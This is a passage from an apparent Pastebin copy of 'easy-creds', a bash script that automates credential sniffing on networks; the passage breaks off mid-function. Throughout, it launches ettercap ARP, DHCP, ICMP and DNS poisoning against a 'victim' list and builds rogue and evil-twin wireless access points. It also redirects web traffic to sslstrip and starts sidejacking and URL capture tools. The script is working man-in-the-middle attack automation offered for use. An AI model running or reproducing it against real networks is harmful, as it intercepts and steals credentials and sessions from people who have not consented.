Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- ##################################################################################################################
- # easy-creds is a simple bash script which makes sniffing networks for credentials a little easier. #
- # #
- # J0hnnyBrav0 (@Brav0hax) & help from al14s (@al14s) #
- ##################################################################################################################
- # v3.7.3 Garden of Your Mind - 12/11/2012
- #
- # Copyright (C) 2012 Eric Milam
- # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public
- # License as published by the Free Software Foundation; either version 2 of the License, or any later version.
- #
- # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
- # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
- #
- # You should have received a copy of the GNU General Public License along with this program; if not, write to the
- # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
- ##################################################################################################################
- #
- #Clear some variables
- unset wireless
- unset etterlaunch
- unset offset
- unset eviltwin
- unset vercompare
- unset dosattack
- unset karmasploit
- unset x
- unset y
- #Save the starting location path
- location=$PWD
- #Find the ettercap version. Will be used for f_whichetter
- ettercapversion=$(ettercap -v|grep 2012|grep -o "0.7.4.2")
- #Create the log folder in PWD
- if [ -z $1 ]; then
- logfldr=$PWD/easy-creds-$(date +%F-%H%M)
- mkdir -p $logfldr
- else
- logfldr=$1
- fi
- # Catch ctrl-c input from user
- trap f_Quit 2
- #
- # MISCELLANEOUS FUNCTIONS
- #
- ##################################################
- f_isxrunning(){
- # Check to see if X is running
- if [ -z $(pidof X) ] && [ -z $(pidof Xorg) ]; then
- isxrunning=
- else
- isxrunning=1
- fi
- # Uncomment the following line to launch attacks in a screen session instead of an xterm window.
- #unset isxrunning
- if [ -z $isxrunning ]; then
- echo -e "\n\e[1;31m[-] X Windows not detected, your attack will be launched in screen\e[0m\n"
- sleep 2
- fi
- }
- ##################################################
- f_findpaths(){
- # Grab the paths from the config file
- updatedb &> /dev/null
- easy_creds_config=$(locate easy-creds.paths)
- source $easy_creds_config
- }
- ##################################################
- f_xtermwindows(){
- x="0" # x offset value
- y="0" # y offset value
- width="100" # width value
- height="7" # height value
- yoffset="120" # y offset
- }
- ##################################################
- f_checkexit(){
- if [ -z $clean ]; then
- f_Quit
- else
- rm -rf /tmp/ec &> /dev/null
- clear
- exit 2> /dev/null
- fi
- }
- ##################################################
- f_Quit(){
- echo -e "\n\n\e[1;33m[*] Please standby while we clean up your mess...\e[0m\n"
- sleep 3
- if [ -e /tmp/ec/sslstrip.pid ]; then kill $(cat /tmp/ec/sslstrip.pid); fi
- if [ ! -z $(pidof hamster) ]; then kill $(pidof hamster); fi
- if [ ! -z $(pidof ferret) ]; then kill $(pidof ferret); fi
- if [ ! -z $(pidof ettercap) ]; then kill $(pidof ettercap); fi
- if [ ! -z $(pidof urlsnarf) ]; then kill $(pidof urlsnarf); fi
- if [ ! -z $(pidof dsniff) ]; then kill $(pidof dsniff); fi
- if [ ! -z $wireless ]; then
- kill $(pidof airbase-ng) $(pidof hamster) $(pidof ferret) $(cat /tmp/ec/tail.pid)
- if [ -e /tmp/ec/sleep.pid ]; then kill $(cat /tmp/ec/sleep.pid); fi
- service isc-dhcp-server stop &> /dev/null
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- #for $MONMODE in $(airmon-ng | grep mon | cut -f1); do #stop 'em all
- airmon-ng stop $MONMODE &> /dev/null
- #done
- fi
- echo "0" > /proc/sys/net/ipv4/ip_forward
- if [ ! -z $dosattack ] ; then
- airmon-ng stop $dosmon &> /dev/null
- airmon-ng stop $airomon &> /dev/null
- fi
- if [ ! -z $karmasploit ] ; then
- kill $(cat /tmp/ec/ec-karma-pid) &> /dev/null
- kill $(cat /tmp/ec/ec-metasploit-pid) &> /dev/null
- fi
- if [ ! -z $fra ]; then
- kill $(pidof radiusd) &> /dev/null
- kill $(pidof hostapd) &> /dev/null
- kill $(cat /tmp/ec/tail.pid) &> /dev/null
- kill $(cat /tmp/ec/tshark.pid) &> /dev/null
- mv $pathtoradiusconf/radiusd.conf.back $pathtoradiusconf/radiusd.conf
- mv $pathtoradiusconf/clients.conf.back $pathtoradiusconf/clients.conf
- echo "" > $freeradiuslog
- fi
- if [ "$mainchoice" == "5" ]; then
- clear
- rm -rf /tmp/ec
- exit 2> /dev/null
- fi
- rm -rf /tmp/ec
- bash $0 $logfldr
- kill $$ 2> /dev/null
- clean=1
- }
- ##################################################
- #
- # PREREQ AND CONFIGURATION FUNCTIONS
- #
- ##################################################
- f_addtunnel(){
- if [ -z $isxrunning ];then
- if [ -e /etc/default/isc-dhcp-server ]; then
- nano /etc/default/isc-dhcp-server
- elif [ -e /etc/sysconfig/dhcpd ]; then
- nano /etc/sysconfig/dhcpd
- else
- nano /etc/default/isc-dhcp-server
- fi
- else
- if [ -e /etc/default/isc-dhcp-server ]; then
- xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
- elif [ -e /etc/sysconfig/dhcpd ]; then
- xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/sysconfig/dhcpd &
- else
- xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano /etc/default/isc-dhcp-server &
- fi
- fi
- f_prereqs
- }
- ##################################################
- f_nanoetter(){
- if [ -z $isxrunning ];then
- nano /etc/etter.conf
- else
- xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter Conf" -e nano /etc/etter.conf &
- fi
- f_prereqs
- }
- ##################################################
- f_nanoetterdns(){
- if [ -z $isxrunning ];then
- nano /usr/local/share/ettercap/etter.dns
- else
- xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter DNS" -e nano /usr/local/share/ettercap/etter.dns &
- fi
- f_prereqs
- }
- ##################################################
- f_dhcp3install(){
- clear
- f_Banner
- echo -e "\e[1;33m[*] Installing dhcp-server, please stand by.\e[0m\n"
- if [ -e /etc/lsb-release ] || [ -e /etc/issue ]; then
- apt-get update &> /dev/null && apt-get install isc-dhcp-server &> /dev/null
- elif [ -e /etc/redhat-release ]; then
- yum install dhcp* &> /dev/null
- else
- echo -e "\e[1;31m[-] I can't determine your OS, please install isc-dhcp-server manually\e[0m"
- fi
- echo -e "\n\e[1;32m[+] Finished installing dhcp3-server.\e[0m\n"
- sleep 3
- f_prereqs
- }
- ##################################################
- f_karmareqs(){
- clear
- f_Banner
- echo -e "\e[1;33m[*] Installing Karmetasploit Prerequisites, please standby.\e[0m\n"
- gem install activerecord
- echo -e "\n\e[1;32m [+] Finished installing Karmetasploit Prerequisites.\e[0m\n"
- sleep 3
- f_prereqs
- }
- ##################################################
- f_msfupdate(){
- clear
- f_Banner
- echo -e "\e[1;33m[*] Updating the Metasploit Framework, please stand by.\e[0m\n"
- msfupdate
- echo -e "\n\e[1;32m [+] Finished updating the Metasploit Framework.\e[0m\n"
- sleep 3
- f_prereqs
- }
- ##################################################
- f_aircrackupdate(){
- clear
- f_Banner
- echo -e "\n\e[1;33m[*] Updating aircrack-ng from SVN, please be patient...\e[0m"
- svn co http://trac.aircrack-ng.org/svn/trunk/ /tmp/ec/aircrack-ng
- cd /tmp/ec/aircrack-ng/
- make && make install > /dev/null
- echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
- sleep 2
- echo -e "\e[1;33m[*] Updating airodump-ng OUI.\e[0m\n"
- bash $airodumppath/airodump-ng-oui-update > /dev/null
- echo -e "\n\e[1;32m[+] Finished updating Aircrack.\e[0m\n"
- sleep 3
- cd $location
- f_prereqs
- }
- ##################################################
- f_sslstrip_vercheck(){
- clear
- f_Banner
- echo -e "\n\e[1;33m[*] Checking the thoughtcrime website for the latest version of SSLStrip...\e[0m\n"
- #Get the installed version
- echo cat $sslstrippath/setup.py|grep version|cut -d "'" -f2
- installedver=$(cat $sslstrippath/setup.py|grep version|cut -d "'" -f2)
- # Change to tmp folder to keep things clean then get the index.html from thoughtcrime.com for SSLStrip
- cd /tmp/ec
- wget -q http://www.thoughtcrime.org/software/sslstrip/index.html
- latestver=$(cat index.html | grep "cd sslstrip"| cut -d "-" -f2|cut -d "<" -f1)
- cd $location
- echo -e "\n\e[1;33m[*] Installed version of SSLStrip: $installedver\e[0m\n"
- echo -e "\nLatest version of SSLStrip: $latestver\n"
- if [ $(echo "$installedver < $latestver"|bc) == "1" ]; then
- echo -e "\n\e[1;33m[*] You have version\e[0m \e[1;31m$installedver\e[0m \e[1;33m installed, version\e[0m \e[1;32m$latestver\e[0m \e[1;33m is available.\e[0m\n"
- read -p "Would you like to install the latest version? [y/N]: " yn
- if [ $(echo ${yn} | tr 'A-Z' 'a-z') == 'y' ]; then f_sslstripupdate; fi
- else
- echo -e "\n\e[1;32m[+] Looks like you're running the latest version available.\e[0m \n"
- sleep 3
- fi
- f_prereqs
- }
- ##################################################
- f_sslstripupdate(){
- clear
- f_Banner
- echo -e "\n\e[1;31m[-] This will install SSLStrip from the thoughtcrime website, not the repositories.\e[0m\n\e[1;33m[*] Hit return to continue or ctrl-c to cancel and return to main menu.\e[0"
- read
- cp -R "$sslstrippath" /tmp/ec/sslstrip-$installedver
- echo -e "\n\e[1;33m[*] Downloading the tar file...\e[0m"
- cd /tmp/ec/
- wget -q http://www.thoughtcrime.org/software/sslstrip/sslstrip-$latestver.tar.gz
- echo -e "\n\e[1;33m[*] Installing the latest version of SSLStrip...\e[0m"
- tar -xvf sslstrip-$latestver.tar.gz
- mv -f /tmp/ec/sslstrip-$latestver $sslstrippath/sslstrip
- python $sslstrippath/setup.py install &> /dev/null
- cd $location
- echo -e "\n\e[1;32m[+] Version $latestver has been installed.\e[0m\n"
- sleep 2
- }
- ##################################################
- f_howtos(){
- xdg-open http://www.youtube.com/user/Brav0Hax/videos &
- f_prereqs
- }
- ##################################################
- f_pbs(){
- xdg-open http://www.youtube.com/watch?v=OFzXaFbxDcM &
- f_mainmenu
- }
- ##################################################
- #
- # POISONING ATTACK FUNCTIONS
- #
- ##################################################
- f_getvics(){
- read -p "Do you have a populated file of victims to use? [y/N]: " VICFILE
- if [ "$(echo ${VICFILE} | tr 'A-Z' 'a-z')" == "y" ]; then
- VICLIST=
- p=
- if [ -e /tmp/victims ]; then p="[/tmp/victims]"; fi
- while [ -z $VICLIST ]; do
- read -e -p "Path to the victim list file $p : " VICLIST
- if [ -z $VICLIST ] && [ -n $p ]; then VICLIST="/tmp/victims"; fi
- done
- else
- VICS=
- while [ -z $VICS ]; do read -p "IP address or range of IPs to poison (ettercap format): " VICS; done
- fi
- GW=
- p=$(route | grep default | awk '{print $2}')
- while [ -z $GW ]; do
- read -p "IP address of the gateway [$p] : " GW
- if [ -z $GW ];then GW=$p; fi
- done
- f_whichettercap
- }
- ##################################################
- f_whichettercap(){
- if [ "$VICFILE" == "y" ]; then
- case $poisoningchoice in
- 2) etterlaunch=1 ;;
- 3) etterlaunch=3 ;;
- 5) etterlaunch=8 ;;
- esac
- else
- case $poisoningchoice in
- 2) etterlaunch=2 ;;
- 3) etterlaunch=4 ;;
- 5) etterlaunch=9 ;;
- esac
- fi
- }
- ##################################################
- f_HostScan(){
- clear
- f_Banner
- range=
- while [ -z "$range" ]; do read -p "Enter your target network range (nmap format): " range; done
- echo -e "Performing an ARP scan to identify live devices - excluding our IPs.\n\nThis may take a bit.\n"
- #take our addresses out of the mix ;)
- myaddrs=$(printf "%s," $(ifconfig | grep "inet" | grep -v "127.0.0.1" | awk '{print $2}' | sed 's/addr://g'))
- nmap -PR -n -sn $range --exclude $myaddrs -oN /tmp/ec/nmap.scan
- grep -e report -e MAC /tmp/ec/nmap.scan | sed '{ N; s/\n/ /; s/Nmap scan report for //g; s/MAC Address: //g; s/ (.\+//g; s/$/ -/; }' > /tmp/victims
- echo -e "\n\e[1;33m[*] Your victim host list is at /tmp/victims.\e[0m\n"
- echo -e "\n\e[1;31m[-] Remember to remove any IPs that should not be poisoned!\e[0m\n"
- read -p "Would you like to edit the victim host list? [y/N] : " yn
- if [ $(echo $yn | tr 'A-Z' 'a-z') == "y" ]; then
- if [ -z $isxrunning ];then
- nano /tmp/victims
- else
- xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Victims List" -e nano /tmp/victims &
- fi
- fi
- f_poisoning
- }
- ##################################################
- f_setup(){
- echo -e "Network Interfaces:\n"
- ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
- IFACE=
- while [ -z $IFACE ]; do
- read -p "Interface connected to the network (ex. eth0): " IFACE
- done
- echo -e "\n\n\e[1;33m[*] Setting up iptables to handle traffic routing...\e[0m\n"
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- sleep 3
- f_xtermwindows
- }
- ##################################################
- f_Standard(){
- clear
- f_Banner
- f_setup
- f_getvics
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_Oneway(){
- clear
- f_Banner
- f_setup
- f_getvics
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_DHCPPoison(){
- clear
- f_Banner
- f_setup
- etterlaunch=5
- POOL=
- while [ -z "$POOL" ]; do read -p "Pool of IP address to assign to your victims: " POOL; done
- MASK=
- while [ -z "$MASK" ]; do read -p "Netmask to assign to your victims: " MASK; done
- DNS=
- while [ -z "$DNS" ]; do read -p "DNS IP to assign to your victims: " DNS; done
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_DNSPoison(){
- clear
- f_Banner
- f_setup
- f_getvics
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_ICMPPoison(){
- clear
- f_Banner
- f_setup
- etterlaunch=6
- GATEMAC=
- while [ -z "$GATEMAC" ]; do read -p "MAC address of the gateway: " GATEMAC; done
- GATEIP=
- while [ -z "$GATEIP" ]; do read -p "IP address of the gateway: " GATEIP; done
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_sidejack(){
- echo -e "\n\e[1;33m[*] Starting Hamster & Ferret...\e[0m\n"
- cd $logfldr
- screen -dmS SideJack -t ferret bash -c "$ferretpath/ferret -i $IFACE"
- sleep 2
- screen -S SideJack -t hamster -X screen $hamsterpath/hamster
- cd $location
- sleep 2
- echo -e "\n\e[1;33m[*] Run firefox and type http://hamster\e[0m\n"
- echo -e "\e[1;33m[*] Don't forget to set the proxy to 127.0.0.1:1234\e[0m\n"
- sleep 5
- }
- ##################################################
- f_ecap(){
- echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
- y=$(($y+$yoffset))
- case $etterlaunch in
- 1) type="[arp:remote]"
- c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
- 2) type="[arp:remote]"
- c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
- 3) type="[arp:oneway]"
- c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE // /$GW/" ;;
- 4) type="[arp:oneway]"
- c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS/ /$GW/" ;;
- 5) type="[dhcp:$POOL/$MASK/$DNS/]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
- 6) type="[icmp:$GATEMAC/$GATEIP]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
- 7) type="[tunnel]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE // //" ;;
- 8) type="[dns_spoof / arp]"
- c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ //" ;;
- 9) type="[dns_spoof / arp]"
- c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW/ /$VICS/" ;;
- esac
- if [ ! -z $isxrunning ]; then
- xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
- else
- screen -S easy-creds -t ettercap -X screen $c
- fi
- ecpid=$(pidof ettercap)
- }
- ##################################################
- f_ecap_assimilation(){
- #Used if version of ettercap is 0.7.5 and above. Target specification format changed for IPv6
- echo -e "\n\e[1;33m[*] Launching ettercap, poisoning specified hosts.\e[0m\n"
- y=$(($y+$yoffset))
- case $etterlaunch in
- 1) type="[arp:remote]"
- c="ettercap -a /etc/etter.conf -M arp:remote -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
- 2) type="[arp:remote]"
- c="ettercap -a /etc/etter.conf -M arp:remote -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
- 3) type="[arp:oneway]"
- c="ettercap -a /etc/etter.conf -M arp:oneway -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /// /$GW//" ;;
- 4) type="[arp:oneway]"
- c="ettercap -a /etc/etter.conf -M arp:oneway -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$VICS// /$GW//" ;;
- 5) type="[dhcp:$POOL/$MASK/$DNS/]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M dhcp:$POOL/$MASK/$DNS/" ;;
- 6) type="[icmp:$GATEMAC/$GATEIP]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE -M icmp:$GATEMAC/$GATEIP" ;;
- 7) type="[tunnel]"
- c="ettercap -a /etc/etter.conf -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $TUNIFACE /// ///" ;;
- 8) type="[dns_spoof / arp]"
- c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -j $VICLIST -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// ///" ;;
- 9) type="[dns_spoof / arp]"
- c="ettercap -a /etc/etter.conf -P dns_spoof -M arp -T -q -l $logfldr/ettercap$(date +%F-%H%M) -i $IFACE /$GW// /$VICS//" ;;
- esac
- if [ ! -z $isxrunning ]; then
- xterm -geometry "$width"x$height-$x+$y -T "Ettercap - $type" -l -lf $logfldr/ettercap$(date +%F-%H%M).txt -bg white -fg black -e $c &
- else
- screen -S easy-creds -t ettercap -X screen $c
- fi
- ecpid=$(pidof ettercap)
- }
- ##################################################
- #
- # FAKE AP ATTACK FUNCTIONS
- #
- ##################################################
- f_fakeapAttack(){
- wireless=1
- offset=1
- # Credit to Lucafa's post on the Offensive-Security forums, used as a base
- clear
- f_Banner
- f_xtermwindows
- SIDEJACK=
- read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
- SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
- echo -e "Network Interfaces:\n"
- ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n'
- IFACE=
- while [ -z "$IFACE" ]; do read -p "Interface connected to the internet (ex. eth0): " IFACE; done
- wirelesscheck=$(airmon-ng | grep 'wlan')
- if [ ! -z "$wirelesscheck" ]; then
- airmon-ng
- else
- echo -e "\n\e[1;31m[-] I can't find a wireless interface to display...continuing anyway\e[0m\n"
- sleep 5
- fi
- WIFACE=
- while [ -z "$WIFACE" ]; do read -p "Wireless interface name (ex. wlan0): " WIFACE; done
- if [ -z $eviltwin ]; then
- ESSID=
- while [ -z "$ESSID" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done
- CHAN=
- while [ -z "$CHAN" ]; do read -p "Channel you would like to broadcast on: " CHAN; done
- airmon-ng start $WIFACE $CHAN &> /dev/null
- elif [ "$eviltwin" == "1" ]; then
- airmon-ng start $WIFACE &> /dev/null
- fi
- modprobe tun
- echo -e "\n\e[1;33m[*] Your interface has now been placed in Monitor Mode\e[0m\n"
- airmon-ng | grep mon | sed '$a\\n'
- MONMODE=
- while [ -z "$MONMODE" ]; do read -p "Enter your monitor enabled interface name, (ex: mon0): " MONMODE; done
- TUNIFACE=
- while [ -z "$TUNIFACE" ]; do read -p "Enter your tunnel interface, example at0: " TUNIFACE; done
- read -p "Do you have a dhcpd.conf file to use? [y/N]: " DHCPFILE
- DHCPFILE=$(echo $DHCPFILE | tr 'A-Z' 'a-z')
- if [ "$DHCPFILE" == "y" ]; then
- f_dhcpconf
- else
- f_dhcpmanual
- fi
- f_dhcptunnel
- }
- ##################################################
- f_dhcpconf(){
- dhcpdconf=
- if [ -d /etc/dhcp]; then #Ubuntu/Debian dhcp3-server
- dhcpdconf="/etc/dhcp/dhcpd.conf"
- elif [ -e /etc/dhcpd.conf ]; then #redhat/fedora old
- dhcpdconf="/etc/dhcpd.conf"
- else
- dhcpdconf="/etc/dhcp/dhcpd.conf" #Ubuntu/Debian/RH/Fedora isc-dhcp-server
- fi
- valid=
- while [[ $valid != 1 ]]; do
- read -e -p "Path to the dhcpd.conf file [$dhcpdconf]: " DHCPPATH
- if [ -z "$DHCPPATH" ]; then DHCPPATH=$dhcpdconf; fi
- if [ ! -f "$DHCPPATH" ]; then
- echo -e "File not found - $DHCPPATH\n"
- else
- valid=1
- fi
- done
- cat $DHCPPATH > /tmp/ec/dhcpd.conf
- mv /tmp/ec/dhcpd.conf $dhcpdconf
- DHCPPATH=$dhcpdconf
- #If your DHCP conf file is setup properly, this will work, otherwise you need to tweak it
- ATNET=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f2)
- ATIP=$(cat $DHCPPATH |grep -i "option routers"|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
- ATSUB=$(cat $DHCPPATH |grep -i subnet|cut -d" " -f4)
- ATCIDR=$(ipcalc -b $ATNET/$ATSUB|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\/[0-9]\{1,2\}')
- }
- ##################################################
- f_ipcalc(){
- dhcpdconf=
- if [ -d /etc/dhcp ]; then
- dhcpdconf="/etc/dhcp/dhcpd.conf"
- elif [ -e /etc/sysconfig/dhcpd ]; then
- dhcpdconf="/etc/dhcpd.conf"
- else
- dhcpdconf="/etc/dhcp/dhcp.conf"
- fi
- DHCPPATH=$dhcpdconf
- #use ipcalc to complete the DHCP setup
- ipcalc "$ATCIDR" > /tmp/ec/atcidr
- ATNET=$(cat /tmp/ec/atcidr|grep Address| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
- ATIP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
- ATSUB=$(cat /tmp/ec/atcidr|grep Netmask| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
- ATBROAD=$(cat /tmp/ec/atcidr|grep Broadcast| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
- ATLSTARTTMP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
- ATLSTART=$(echo $ATLSTARTTMP.100)
- ATLENDTMP=$(cat /tmp/ec/atcidr|grep HostMax| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3)
- ATLEND=$(echo $ATLENDTMP.200)
- echo -e "\n\n\e[1;33m[*] Creating a dhcpd.conf to assign addresses to clients that connect to us.\e[0m"
- echo "ddns-update-style none;" > $DHCPPATH
- echo "authoritative;" >> $DHCPPATH
- echo "log-facility local7;" >> $DHCPPATH
- echo "subnet $ATNET netmask $ATSUB {" >> $DHCPPATH
- echo " range $ATLSTART $ATLEND;" >> $DHCPPATH
- echo " option domain-name-servers $ATDNS;" >> $DHCPPATH
- echo " option routers $ATIP;" >> $DHCPPATH
- echo " option broadcast-address $ATBROAD;" >> $DHCPPATH
- echo " default-lease-time 600;" >> $DHCPPATH
- echo " max-lease-time 7200;" >> $DHCPPATH
- echo "}" >> $DHCPPATH
- }
- ##################################################
- f_dhcpmanual(){
- ATCIDR=
- while [ -z "$ATCIDR" ]; do
- read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR
- if [[ ! $ATCIDR =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}$ ]]; then ATCIDR=; fi
- done
- ATDNS=
- while [ -z "$ATDNS" ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done
- f_ipcalc
- }
- ##################################################
- f_dhcptunnel(){
- etterlaunch=7
- # airbase-ng is going to create our fake AP with the SSID we specified
- echo -e "\n\e[1;33m[*] Launching Airbase with your settings.\e[0m"
- if [ "$eviltwin" == "1" ] && [ -z $isxrunning ]; then
- screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 60 -e "$ESSID" $MONMODE
- elif [ "$eviltwin" == "1" ] && [ ! -z $isxrunning ]; then
- xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -P -C 60 -e "$ESSID" $MONMODE &
- elif [ -z $isxrunning ]; then
- screen -dmS easy-creds -t Airbasg-NG airbase-ng -e "$ESSID" -c $CHAN $MONMODE
- else
- xterm -geometry "$width"x$height-$x+$y -T "Airbase-NG" -e airbase-ng -e "$ESSID" -c $CHAN $MONMODE &
- fi
- sleep 7
- echo -e "\n\e[1;33m[*] Configuring tunneled interface.\e[0m"
- ifconfig "$TUNIFACE" up
- ifconfig "$TUNIFACE" "$ATIP" netmask "$ATSUB"
- ifconfig "$TUNIFACE" mtu 1500
- route add -net "$ATNET" netmask "$ATSUB" gw "$ATIP" dev "$TUNIFACE"
- sleep 2
- echo -e "\n\e[1;33m[*] Setting up iptables to handle traffic seen by the tunneled interface.\e[0m"
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -P FORWARD ACCEPT
- iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- sleep 2
- echo -e "\n\e[1;33m[*] Launching Tail.\e[0m"
- if [ -z $isxrunning ]; then
- screen -S easy-creds -t DMESG -X tail -f /var/log/messages
- else
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "DMESG" -bg black -fg red -e tail -f /var/log/messages &
- fi
- echo $! > /tmp/ec/tail.pid
- sleep 3
- echo -e "\n\e[1;33m[*] DHCP server starting on tunneled interface.\e[0m\n"
- if [ -e /etc/dhcp/dhcpd.conf ]; then
- dhcpd -q -cf $DHCPPATH -pf /var/run/isc-dhcp-server/dhcpd.pid $TUNIFACE &
- elif [ -e /etc/sysconfig/dhcpd ]; then
- systemctl start dhcpd.service
- else
- service dhcpd start
- fi
- sleep 3
- f_finalstage
- f_mainmenu
- }
- ##################################################
- f_finalstage(){
- if [ -z $wireless ]; then
- read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK
- SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')"
- fi
- if [ "$etterlaunch" -lt "8" ];then
- if [ ! -z $isxrunning ]; then
- echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
- if [ "$offset" == "1" ]; then
- y=$(($y+$yoffset))
- fi
- sslstripfilename=sslstrip$(date +%F-%H%M).log
- xterm -geometry "$width"x$height-$x+$y -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w $logfldr/$sslstripfilename &
- else
- echo -e "\n\e[1;33m[*] Launching SSLStrip...\e[0m\n"
- sslstripfilename=sslstrip$(date +%F-%H%M).log
- screen -dmS easy-creds -t sslstrip -pfk -w $logfldr/$sslstripfilename
- fi
- fi
- echo $! > /tmp/ec/sslstrip.pid
- sleep 2
- if [ -z "$ettercapversion" ]; then
- f_ecap
- else
- f_ecap_assimilation
- fi
- sleep 3
- echo -e "\n\e[1;33m[*] Configuring IP forwarding...\e[0m\n"
- echo "1" > /proc/sys/net/ipv4/ip_forward
- sleep 3
- echo -e "\n\e[1;33m[*] Launching URLSnarf...\e[0m\n"
- if [ "$wireless" == "1" ]; then
- y=$(($y+$yoffset))
- xterm -geometry "$width"x$height-$x+$y -T "URL Snarf" -l -lf $logfldr/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i $TUNIFACE &
- sleep 3
- elif [ "$wireless" == "1" ] && [ -z $isxrunning ]; then
